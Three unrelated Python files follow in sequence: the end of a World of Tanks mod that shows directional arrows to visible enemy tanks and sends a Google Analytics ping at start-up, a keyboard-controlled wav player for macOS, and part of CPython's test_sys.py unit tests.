return config_new
@staticmethod
def code_pa(text):
try:
return text.encode('windows-1251')
except StandardError:
return text
def debugs(self, text):
if self.debug:
try:
text = text.encode('windows-1251')
except StandardError:
pass
print '%s%s [%s]: %s' % (datetime.datetime.now(), self.sys_mes['DEBUG'], self.code_pa(self.description), text)
def analytics_do(self):
if not self.analytics_started:
player = BigWorld.player()
param = urllib.urlencode({
'v': 1, # Version.
'tid': '%s' % self.tid, # Tracking ID / Property ID.
'cid': player.databaseID, # Anonymous Client ID.
't': 'screenview', # Screenview hit type.
'an': '%s' % self.description_analytics, # App name.
'av': '%s %s' % (self.description_analytics, self.version), # App version.
'cd': 'start [%s]' % AUTH_REALM # Screen name / content description.
})
self.debugs('http://www.google-analytics.com/collect?%s' % param)
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
def analytics(self):
self._thread_analytics = threading.Thread(target=self.analytics_do, name='Thread')
self._thread_analytics.start()
def sys_mess(self):
self.sys_mes = {
'DEBUG': '[DEBUG]', 'LOAD_MOD': self.code_pa('[ЗАГРУЗКА]: ') if self.ru else '[LOAD_MOD]: ', 'INFO': self.code_pa('[ИНФО]: ') if self.ru else '[INFO]: ',
'ERROR': self.code_pa('[ОШИБКА]: ') if self.ru else '[ERROR]: ',
'MSG_RECREATE_CONFIG': self.code_pa('конфиг не найден, создаем заново') if self.ru else 'Config not found, recreating',
'MSG_RECREATE_CONFIG_DONE': self.code_pa('конфиг создан УСПЕШНО') if self.ru else 'Config recreating DONE',
'MSG_INIT': self.code_pa('применение настроек...') if self.ru else 'initialized ...', 'MSG_LANGUAGE_SET': self.code_pa('Выбран язык:') if self.ru else 'Language set to:',
'MSG_DISABLED': self.code_pa('отключен ...') if self.ru else 'disabled ...'
}
def load_mod(self):
self.do_config()
self.sys_mess()
print ''
print '%s[%s, %s]' % (self.sys_mes['LOAD_MOD'], self.code_pa(self.description), self.code_pa(self.author))
if self.enable:
self.debugs('Debug Activated ...')
print '%s[%s %s %s...]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.sys_mes['MSG_LANGUAGE_SET'], self.code_pa(self.data['config'].get('language')))
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_INIT'])
else:
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_DISABLED'])
print ''
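# CustomFlash: wrapper around the dir_indicator_extended.swf overlay that draws one
# directional arrow and exposes setters for its shape, distance and vehicle name.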
class CustomFlash(Flash, IDirectionIndicator):
__SWF_FILE_NAME = 'dir_indicator_extended.swf'
__FLASH_CLASS = 'WGDirectionIndicatorFlash'
__FLASH_MC_NAME = 'directionalIndicatorMc'
__FLASH_SIZE = (680, 680)
def __init__(self):
Flash.__init__(self, self.__SWF_FILE_NAME, self.__FLASH_CLASS, [self.__FLASH_MC_NAME]) #, self.__FLASH_PATH)
self.component.wg_inputKeyMode = 2
self.component.position.z = DEPTH_OF_Aim
self.movie.backgroundAlpha = 0.0
self.movie.scaleMode = 'NoScale'
self.component.focus = False
self.component.moveFocus = False
self.component.heightMode = 'PIXEL'
self.component.widthMode = 'PIXEL'
self.flashSize = self.__FLASH_SIZE
self.component.relativeRadius = 0.5
self.__dObject = getattr(self.movie, self.__FLASH_MC_NAME, None)
return
def set_shape(self, shape):
if self.__dObject:
self.__dObject.setShape(shape)
def set_distance(self, distance):
if self.__dObject:
self.__dObject.setDistance(distance)
def set_vehicle_name(self, vehicle_name):
if self.__dObject:
self.__dObject.setVName(vehicle_name)
def track(self, position):
if not self.component.visible:
self.active(True)
self.component.visible = True
self.component.position3D = position
def stop(self):
if self.component.visible:
self.active(False)
self.component.visible = False
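# DirIndication: tracks every enemy vehicle, creates a CustomFlash arrow per enemy
# and refreshes visibility and distance twice a second during a battle.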
class DirIndication(object):
def __init__(self):
self.primary_indication = config.data['config'].get('primary_indication')
self.secondary_indication = config.data['config'].get('secondary_indication')
self.max_distance_primary_indication = config.data['config'].get('max_distance_primary_indication', 0)
self.max_distance_secondary_indication = config.data['config'].get('max_distance_secondary_indication', 0)
self.strategic_fear_mode = config.data['config'].get('strategic_fear_mode')
self.red_to_purple_indication = config.data['config'].get('red_to_purple_indication')
self.distance_indicator = config.data['config'].get('distance_indicator')
self.tank_name_indicator = config.data['config'].get('tank_name_indicator')
self.enemies_list = {}
self.callback = None
def clear_vars(self):
for i in self.enemies_list.keys():
self.del_indicator(i)
self.enemies_list.clear()
self.callback = None
def start_battle(self):
if config.enable:
BigWorld.player().arena.onVehicleKilled += self.on_vehicle_killed
self.clear_vars()
self.callback = BigWorld.callback(0.5, self.refresh_indicator)
def stop_battle(self):
if config.enable:
BigWorld.player().arena.onVehicleKilled -= self.on_vehicle_killed
if self.callback:
BigWorld.cancelCallback(self.callback)
self.callback = None
self.clear_vars()
def init_vehicle(self, vehicle_id):
if self.get_is_live(vehicle_id):
self.check_visible(vehicle_id)
if not self.get_is_friendly(vehicle_id) and vehicle_id not in self.enemies_list:
self.enemies_list[vehicle_id] = {}
self.enemies_list[vehicle_id]['dir_indicator'] = CustomFlash()
self.enemies_list[vehicle_id]['distance'] = 10000
def fin_vehicle(self, vehicle_id):
if vehicle_id in self.enemies_list:
self.disable_indicator(vehicle_id)
@staticmethod
def add_observed_point(vehicle_id):
vehicle = BigWorld.player().arena.vehicles[vehicle_id]
try:
if 'vehicleType' in vehicle:
vehicle_type = vehicle['vehicleType']
if not hasattr(vehicle_type, 'observer_pos_on_chassis'):
hull_pos = vehicle_type.chassis['hullPosition']
hull_bbox_min, hull_bbox_max, _ = vehicle_type.hull['hitTester'].bbox
turret_pos_on_hull = vehicle_type.hull['turretPositions'][0]
turret_local_top_y = max(hull_bbox_max.y, turret_pos_on_hull.y + vehicle_type.turret['hitTester'].bbox[1].y)
vehicle_type.observer_pos_on_chassis = Vector3(0, hull_pos.y + turret_local_top_y, 0)
return True
return False
except StandardError:
return False
def enable_indicator(self, vehicle_id, checkpoint):
if vehicle_id in self.enemies_list:
if 'dir_indicator' in self.enemies_list[vehicle_id]:
self.enemies_list[vehicle_id]['dir_indicator'].track(checkpoint)
if self.distance_indicator:
self.enemies_list[vehicle_id]['dir_indicator'].set_distance(self.enemies_list[vehicle_id]['distance'])
if self.tank_name_indicator:
target_info = g_sessionProvider.getCtx().getFullPlayerNameWithParts(vehicle_id)
if target_info and target_info[4]:
self.enemies_list[vehicle_id]['dir_indicator'].set_vehicle_name(target_info[4])
def on_vehicle_killed(self, target_id, attacker_id, equipment_id, reason):
_, _, _ = attacker_id, reason, equipment_id
if target_id in self.enemies_list:
self.disable_indicator(target_id)
if target_id == BigWorld.player().playerVehicleID:
self.clear_vars()
def disable_indicator(self, vehicle_id):
if vehicle_id in self.enemies_list:
if 'dir_indicator' in self.enemies_list[vehicle_id]: self.enemies_list[vehicle_id]['dir_indicator'].stop()
if 'distance' in self.enemies_list[vehicle_id] and self.enemies_list[vehicle_id]['distance'] < 10000: self.enemies_list[vehicle_id]['distance'] = 10000
def del_indicator(self, vehicle_id):
if vehicle_id in self.enemies_list:
if 'dir_indicator' in self.enemies_list[vehicle_id]:
self.enemies_list[vehicle_id]['dir_indicator'].close()
del self.enemies_list[vehicle_id]
def check_visible(self, slave):
player = BigWorld.player()
master = player.playerVehicleID
if self.add_observed_point(master) and self.add_observed_point(slave):
master_vehicle = player.arena.vehicles[master]['vehicleType']
slave_vehicle = player.arena.vehicles[slave]['vehicleType']
            current_checkpoint = self.translation_points(slave, slave_vehicle.observer_pos_on_chassis)
            # translation_points() may return None; keep current_observe defined in every branch
            current_observe = None
            if current_checkpoint:
                current_observe = self.translation_points(master, master_vehicle.observer_pos_on_chassis)
                if current_observe and BigWorld.wg_collideSegment(player.spaceID, current_observe, current_checkpoint, False) is None:
                    return True, current_observe, current_checkpoint
            return False, current_observe, current_checkpoint
return False, None, None
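    # re-scheduled every 0.5 s via BigWorld.callback: updates distance and
    # visibility for each tracked enemy and shows or hides its arrow.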
def refresh_indicator(self):
aim_mode = BigWorld.player().inputHandler.aim.mode
for vehicle_id in self.enemies_list:
if self.get_is_on_arena(vehicle_id) and self.get_is_live(vehicle_id):
visible, observe, checkpoint = self.check_visible(vehicle_id)
if observe and checkpoint:
position = observe
if self.strategic_fear_mode and 'strategic' in aim_mode:
position = BigWorld.camera().position
self.enemies_list[vehicle_id]['distance'] = (position - checkpoint).length
if visible:
if self.secondary_indication:
if self.enemies_list[vehicle_id]['distance'] < self.max_distance_secondary_indication:
self.enemies_list[vehicle_id]['dir_indicator'].set_shape('purple' if self.red_to_purple_indication else 'red')
self.enable_indicator(vehicle_id, checkpoint)
elif self.primary_indication:
if self.enemies_list[vehicle_id]['distance'] < self.max_distance_primary_indication and vehicle_id in self.check_nearest_target():
self.enemies_list[vehicle_id]['dir_indicator'].set_shape('green')
self.enable_indicator(vehicle_id, checkpoint)
else: self.disable_indicator(vehicle_id)
else: self.disable_indicator(vehicle_id)
else: self.disable_indicator(vehicle_id)
else: self.disable_indicator(vehicle_id)
self.callback = BigWorld.callback(0.5, self.refresh_indicator)
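    # returns a 1-tuple holding the id of the closest tracked enemy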
def check_nearest_target(self):
return min(self.enemies_list.iterkeys(), key=(lambda key: self.enemies_list[key]['distance'])),
@staticmethod
def translation_points(vehicle_id, point):
try: return Matrix(BigWorld.entity(vehicle_id).model.matrix).applyPoint(point)
except StandardError: return
@staticmethod
def get_battle_on():
try:
if BigWorld.player().arena: return True
except StandardError: return False
return hasattr(BigWorld.player(), 'arena')
def get_is_on_arena(self, vehicle_id):
return self.get_battle_on() and vehicle_id in self.enemies_list
@staticmethod
def get_is_live(vehicle_id):
try: return BigWorld.player().arena.vehicles[vehicle_id]['isAlive']
except StandardError: return False
def get_is_friendly(self, vehicle_id):
player = BigWorld.player()
return self.get_battle_on() and player.arena.vehicles[player.playerVehicleID]['team'] == player.arena.vehicles[vehicle_id]['team']
# hook wrappers: call the original client method, then run the mod logic
def hook_update_all(self):
hooked_update_all(self)
config.analytics()
def hook_vehicle_on_enter_world(self, vehicle):
hooked_vehicle_on_enter_world(self, vehicle)
if config.enable: dir_ind.init_vehicle(vehicle.id)
def hook_vehicle_on_leave_world(self, vehicle):
hooked_vehicle_on_leave_world(self, vehicle)
if config.enable: dir_ind.fin_vehicle(vehicle.id)
def hook_start_battle(self):
hooked_start_battle(self)
dir_ind.start_battle()
def hook_stop_battle(self):
hooked_stop_battle(self)
dir_ind.stop_battle()
# start the mod: load the config and create the indicator controller
config = Config()
config.load_mod()
dir_ind = DirIndication()
# keep references to the original client methods
# noinspection PyProtectedMember
hooked_update_all = Hangar._Hangar__updateAll
hooked_vehicle_on_enter_world = PlayerAvatar.vehicle_onEnterWorld
hooked_vehicle_on_leave_world = PlayerAvatar.vehicle_onLeaveWorld
hooked_start_battle = Battle.afterCreate
hooked_stop_battle = Battle.beforeDelete
# install the hook wrappers
# noinspection PyProtectedMember
Hangar._Hangar__updateAll = hook_update_all
PlayerAvatar.vehicle_onEnterWorld = hook_vehicle_on_enter_world
PlayerAvatar.vehicle_onLeaveWorld = hook_vehicle_on_leave_world
Battle.afterCreate = hook_start_battle
Battle.beforeDelete = hook_stop_battle
|
play.py
|
#!/usr/bin/env python3
import sys
import termios
import threading
from argparse import ArgumentParser
from glob import glob
from itertools import chain, count
from os import system
from subprocess import PIPE, Popen, STDOUT
from time import sleep
lock = threading.Lock()
action = None
play_process = None
def set_action(k, e):
global action
action = k
e.set()
def stop():
with lock:
global play_process
if play_process and play_process.poll() is None:
            try:
                play_process.kill()
            except OSError:
                # the process may have exited between poll() and kill()
                pass
def process_monitor(e):
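    # Watcher thread: when the current afplay process finishes on its own,
    # fake an 'n' (next track) action so playback continues.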
global play_process
while True:
with lock:
if play_process and play_process.poll() is not None:
set_action('n', e)
sleep(1)
def play(track):
global play_process
stop()
print('Playing', track)
with lock:
play_process = Popen(['afplay', track], stdout=PIPE, stderr=STDOUT)
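# Keyboard thread: read single keypresses from stdin with canonical mode and
# echo disabled, and publish each key as the next action.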
def get_action(e):
while True:
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
try:
c = sys.stdin.read(1)
set_action(str(c), e)
except IOError:
pass
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
def play_all(tracks):
global action
tracks = sorted(tracks)
keyed_tracks = list(
zip(
chain(range(97, 122), range(65, 90)),
[s.split('/')[-1] for s in tracks]))
e = threading.Event()
threading.Thread(target=get_action, args=(e,), daemon=True).start()
index = 0
threading.Thread(target=process_monitor, args=(e,), daemon=True).start()
play(tracks[index])
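    # controls: n=next, p=previous, b=replay, c=show current, s=stop,
    # l=list tracks and jump to one by its letter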
while action != 's':
e.wait()
e.clear()
if action == 'b':
play(tracks[index])
if action == 'c':
print('Currently playing', tracks[index])
if action == 'n':
index = (index + 1) % len(tracks)
play(tracks[index])
if action == 'p':
index = index - 1 if index > 0 else len(tracks) - 1
play(tracks[index])
if action == 's':
stop()
if action == 'l':
system('clear')
for i, p in keyed_tracks:
print(chr(i), p)
e.wait()
e.clear()
if action != chr(27): # Escape character
for i, entry in zip(count(0), keyed_tracks):
if chr(entry[0]) == action:
index = i
play(tracks[index])
action = ''
print('Done!')
def get_audio_files(path):
return glob(f'{path}/**/*.wav', recursive=True)
def parse_args(args):
parser = ArgumentParser(description='Play wav files on Mac')
parser.add_argument(
'-d', '--wav_dir', help='Directory containing Wav-files', default='.')
return parser.parse_args(args)
def main(wav_dir):
play_all(get_audio_files(wav_dir))
if __name__ == '__main__': # pragma: no cover
main(**parse_args(sys.argv[1:]).__dict__)
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
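# struct format of the dict-keys object header, used by the dict entries
# in SizeofTest.test_objecttypes()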
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
